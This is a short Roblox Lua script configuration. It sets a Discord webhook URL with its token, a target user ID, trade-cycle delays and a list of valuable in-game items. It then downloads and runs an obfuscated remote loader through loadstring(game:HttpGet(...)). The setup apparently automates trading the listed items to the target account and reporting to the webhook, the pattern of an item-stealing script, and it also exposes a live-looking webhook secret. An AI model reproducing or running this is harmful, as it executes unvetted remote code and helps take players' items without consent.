getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1477123578318291084/J50LJE6KTWD31F4V_-C8a5Ic02iRdHIY66nyaY8ArOIKzIkxrlyHIAV5j_GB3EaoBQo6"
getgenv().TARGET_ID = 1182733962
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["La Supreme Combinasion"] = true,
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["La Casa Boo"] = true,
    ["Cerberus"] = true,
    ["Capitano Moby"] = true,
    ["Headless Horseman"] = true,
    ["Spooky and Pumpky"] = true,
    ["Love Love Bear"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Rosey and Teddy"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()
